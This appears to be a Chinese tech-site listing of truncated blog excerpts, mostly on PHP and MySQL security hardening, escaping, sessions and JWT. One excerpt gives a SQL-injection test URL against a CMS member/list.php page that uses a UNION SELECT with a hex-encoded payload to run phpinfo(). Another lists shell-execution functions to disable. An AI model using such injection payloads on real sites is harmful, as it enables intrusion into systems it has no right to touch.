小伙伴们新年好啊,又有半个月没有更新博客了。更新也比较随性,想起什么就写点什么,方便和大家工作同学习总结。最近和同事说起了PHP安全相关的问题,记录下一些心得体会。由于脚本语言和早期版本设计的诸多原因,php项目存在不少安全隐患。从配置选项来看,可以做如下的优化。1.屏蔽PHP错误输出。在/etc/php.ini(默认配置文件位置),将如下配置值改为Offdisplay_errors=Off不要将错误堆栈信息直接输出到网页上,防止黑客加以利用...
复制代码 代码如下:<?php /** * @usage: used to offer safe file write operation in multiple threads context, arbitory file type * @author: Rocky Zhang * @time: Nov. 11 2009 * @demo[0]: $handler = mfopen($file, ‘a+‘); * mfwrite($handler, $str); */ function mfopen($file, $mode=‘w+‘) { $tempfile = generateTempfile(‘./tempdir‘, $file); preg_match(‘/b/i‘, $mode) || ($mode .= ‘b‘); // ‘b‘ is r...
一、MongoDB简介MongoDB (名称来自"humongous") 是一个可扩展的、高性能、开源、模式自由、面向文档的数据库,集文档数据库、键值对存储和关系型数据库的优点于一身。官方站点:http://www.mongodb.org/,MongoDB特点:?面向文档存储(类JSON数据模式简单而强大) ?动态查询 ?全索引支持,扩展到内部对象和内嵌数组 ?查询记录分析 ?快速,就地更新 ?高效存储二进制大对象 (比如照片和视频) ?复制和故障切换支持 ?Auto-Sharding自动分片...
目录结构①常用的安全函数有哪些:②这些函数的作用:③函数的用法:④举例说明:⑤参考资料:由于越来越多的项目开始使用框架,所以,很多的程序员也不在关心安全的问题!因为框架已经帮我们几乎完美的处理了!但是,个人认为,我们还是需要了解一下常用的安全处理函数!原因简单:很多小的功能和项目是用不到框架的,我们需要自己解决安全问题!①常用的安全函数有哪些:mysql_real_escape_string()addslashes()②这些函数的作用...
在ThinkPHP搭建项目的同时,会考虑到后期对静态页面的维护问题,在项目的不断完善的同时,会有大量图片,css文件,以及js文件等一些容易修改、添加、或者删除的资源如果在中后期对各个静态页面,js、css文件逐个修改的话、将是一个繁重的任务、更加不容易修改、这就违背了tp框架的初衷因此,常量的使用极大地改变了这种现状,使得这些操作更加容易执行简单介绍我在开发过程中使用的常量(给静态资源文件文件访问目录设置常量,方便...
近日我们收到了一个关于3.2版本的漏洞提醒,官方已经第一时间进行处理和更新。由于3.2版本已经过了官方的维护和安全更新周期,而且大量的开发者也进行了二次开发,因此不再发布新版,官方仅进行安全公告和修复建议。请还在使用3.2版本的用户按照下面的方式进行安全修复(只需要修改一处核心内置公共函数代码)。 再次提示:无论是否修改了核心,参考下面的修复方式修复即可,不需要下载任何更新包和补丁包。顺便提醒下,如果你使用...
Mysql基本安全设置1.设置或修改Mysql root密码: 默认安装后空密码,以mysqladmin命令设置密码: mysqladmin -uroot password "password" Mysql命令设置密码: mysql> set password for root@localhost=password(‘password); 更改密码: update mysql.user set password=password(‘password‘) where user=‘root‘;flush privileges;2.删除默认的数据库和用户 drop database test;use mysql;delete from db;delete f...
刚搜了一下貌似和以前一个漏洞是一个问题。有点鸡肋,需要条件: 1.网站配置为:文章生成真静态 2.允许注册会员 给出v6的测试代码,提交后执行phpinfo(),v7原理一样,只是数据库字段数不一样。 member/list.php?step=2&Type=delete&aidDB[]=-1)%20union%20select%201,2,3,4,5,6,7,8,9,10,1,2,3,4,15,6,7,8,9,10,1,2,3,4,25,6,7,8,9,10,1,2,3,4,35,6,7,8,9,10,1,2,3,4,45,6,7,8,9,10,1,2,3,4,0x7B247B706870696E666F28...
在调用微信安全内容审核的时候,遇到如下的报错,百度也是搜了一大圈,后来才找到解决的方法,下面就谈谈我的跳坑经历,方便其他同学遇到这样的问题可以快速解决。 这里我们只谈图片内容审核的,其中的文本内容审核比较容易,我就不说了,主要就是图片这里容易遇到坑。{"errcode":41005,"errmsg":"media data missing hint: [zKfcwnNre-61nAMA]"}POST https://api.weixin.qq.com/wxa/img_sec_check?access_token=ACCESS_TOKEN a...
1. mysql_real_escape_string() 这个函数对于在PHP中防止SQL注入攻击很有帮助,它对特殊的字符,像单引号和双引号,加上了“反斜杠”,确保用户的输入在用它去查询以前已经是安全的了。但你要注意你是在连接着数据库的情况下使用这个函数。 但现在mysql_real_escape_string()这个函数基本不用了,所有新的应用开发都应该使用像PDO这样的库对数据库进行操作,也就是说,我们可以使用现成的语句防止SQL注入攻击。 2. a...
因此,我们主要解决的思路是效验session ID的有效性. 以下为引用的内容: 复制代码 代码如下:<?php if(!isset($_SESSION[‘user_agent‘])){ $_SESSION[‘user_agent‘] =$_SERVER[‘REMOTE_ADDR‘].$_SERVER[‘HTTP_USER_AGENT‘]; } /* 如果用户session ID是伪造 */ elseif ($_SESSION[‘user_agent‘] != $_SERVER[‘REMOTE_ADDR‘] .$_SERVER[‘HTTP_USER_AGENT‘]) { session_regenerate_id(); } ?> 原文:http://www.jb51.net...
1.远程文件 PHP是一门具有丰富特性的语言,它提供了大量函数,使程序员能够方便地实现各种功能,远程文件就是一个很好的例子: 代码> $fp=@Fopen($url,"r") or die ("cannot open $url"); while($line=@fgets($fp,1024)) { $contents.=$line; } echo $contents; //显示文件内容 fclose($fp); //关闭文件 ?> 以上是一段利用Fopen函数打开文件的代码,由于Fopen函数支持远程文件,使得它应用起来相当有...
前言实例演示token签名并创建token解析token并校验token合法性类库封装管理jwt实例前言JWT是什么 JWT是json web token缩写。它将用户信息加密到token里,服务器不保存任何用户信息。服务器通过使用保存的密钥验证token的正确性,只要正确即通过验证。基于token的身份验证可以替代传统的cookie+session身份验证方法。 它定义了一种用于简洁,自包含的用于通信双方之间以 JSON 对象的形式安全传递信息的方法。JWT 可以使用 HMAC 算法...
php给了开发者极大的灵活性,但是这也为安全问题带来了潜在的隐患,近期需要总结一下以往的问题,在这里借翻译一篇文章同时加上自己开发的一些感触总结一下。 简介当开发一个互联网服务的时候,必须时刻牢记安全观念,并在开发的代码中体现。PHP脚本语言对安全问题并不关心,特别是对大多数没有经验的开发者来说。每当你讲任何涉及到钱财事务等交易问题时,需要特别注意安全问题的考虑,例如开发一个论坛或者是一个购物车等。 安全...
1、php.ini 修改 open_basedir=‘d:\wwwroot‘ //配置只能访问指定的网站目录2、php.ini 修改 disable_funcitons=system,passthru,exec,shellexec,popen,phpinfo //禁止执行一些函数3、php.ini 修改display_errors =On 为display_errors =Off //禁止显示一些错误4、跨站脚本攻击(XSS)防御方法:写函数或者用htmlentities来进行对html或者javascript标签进行过滤5、sql注入漏洞防御方法:写函数或者addslashes()来过滤SQL关键字即...